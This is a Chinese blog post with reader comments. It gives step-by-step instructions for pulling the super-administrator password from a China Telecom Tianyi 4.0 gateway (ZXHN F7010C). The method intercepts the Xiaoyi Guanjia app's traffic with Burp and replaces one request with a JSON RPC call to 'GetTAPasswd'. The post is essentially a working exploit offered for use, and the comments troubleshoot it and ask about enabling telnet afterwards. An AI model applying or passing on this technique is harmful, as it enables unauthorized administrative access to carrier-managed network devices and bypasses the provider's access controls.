之前讲过天翼3.0的超级管理员密码的破解,利用文件越权漏洞便可以破解,但是4.0的网关该漏洞已经修复。今天来看看如何破解吧!
环境
- 网关型号 ZXHN F7010C
- Burp
- 小翼管家APP
实现原理
登录小翼管家APP,先将指示灯关闭。设置代理后,打开指示灯按钮,然后利用burp抓包。修改包数据即可!
设置代理
打开APP后,点击打开指示灯按钮并抓包。
修改包内容如下:
{
"Params": [],
"MethodName": "GetTAPasswd",
"RPCMethod": "CallMethod",
"ObjectPath": "/com/ctc/igd1/Telecom/System",
"InterfaceName": "com.ctc.igd1.SysCmd",
"ServiceName": "com.ctc.igd1"
}
8 comments
现在还能用吗,试了下ios的小翼管家,貌似没有这个指示灯,并且抓出来的数据看起来已经加密过了
为啥设置代理后,小翼管家里的指示灯开关点击后显示失败?光猫软件版本号:软件版本号F7010_IMS_V4.0.0_JS2208
是4.0的吗?
是的呢
https://imgse.com/i/zYRLRI
这种情况怎么办
是不是4.0的
成功获取到管理员账号,但是后台没有找到telnet的开关,请教一下这时该怎么开启telnet呢?
没有telnet的